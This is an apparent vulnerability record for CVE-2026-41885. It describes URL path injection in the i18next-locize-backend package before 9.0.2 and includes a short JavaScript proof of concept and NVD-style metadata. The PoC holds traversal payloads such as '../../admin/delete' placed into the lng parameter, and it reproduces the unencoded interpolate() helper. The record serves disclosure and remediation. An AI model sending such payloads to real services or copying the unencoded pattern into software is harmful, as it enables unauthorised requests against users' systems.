CVE-2026-41885

// PoC demonstrating URL injection via lng parameter // Attacker sends request: https://target.com?lng=../../admin/delete // Vulnerable code logic in lib/utils.js (interpolate function) function interpolate(str, params) { return str.replace(/\{\{([\w]+)\}\}/g, (match, key) => { return params[key] || match; // No encoding here }); } const config = { loadPath: 'https://api.locize.com/projects/{{projectId}}/{{lng}}/{{ns}}', projectId: 'my-project', ns: 'translation' }; // User controlled input const userInput = { lng: '../../malicious-endpoint', ns: 'default' }; // Vulnerable execution const finalUrl = interpolate(config.loadPath, { ...config, ...userInput }); console.log("Malicious URL constructed:", finalUrl); // Output: https://api.locize.com/projects/my-project/../../malicious-endpoint/default

{"cve": {"id": "CVE-2026-41885", "sourceIdentifier": "[email protected]", "published": "2026-05-08T16:16:11.913", "lastModified": "2026-05-08T16:16:11.913", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "i18next-locize-backend is a simple i18next backend for locize.com which can be used in Node.js, in the browser and for Deno. Prior to version 9.0.2, i18next-locize-backend interpolates lng, ns, projectId, and version directly into the configured loadPath / privatePath / addPath / updatePath / getLanguagesPath URL templates with no path-component validation and no encoding. When an application exposes any of these values to user-controlled input (?lng= / ?ns= query parameters via i18next-browser-languagedetector, cookies, request headers, or a URL-derived projectId), a crafted value can change the structure of the outgoing request URL. Affected call sites in lib/index.js (pre-patch): the interpolate() helper is used at the five URL-build sites — _readAny/read (line 415 for private, 426 for public), getLanguages (lines 271 and 296), and writePage (lines 616 and 622) for the missing-key and update POST paths. The helper interpolate in lib/utils.js substitutes raw values with no encoding. This issue has been patched in version 9.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-74"}]}], "references": [{"url": "https://github.com/locize/i18next-locize-backend/security/advisories/GHSA-mgcp-mfp8-3q45", "source": "[email protected]"}]}}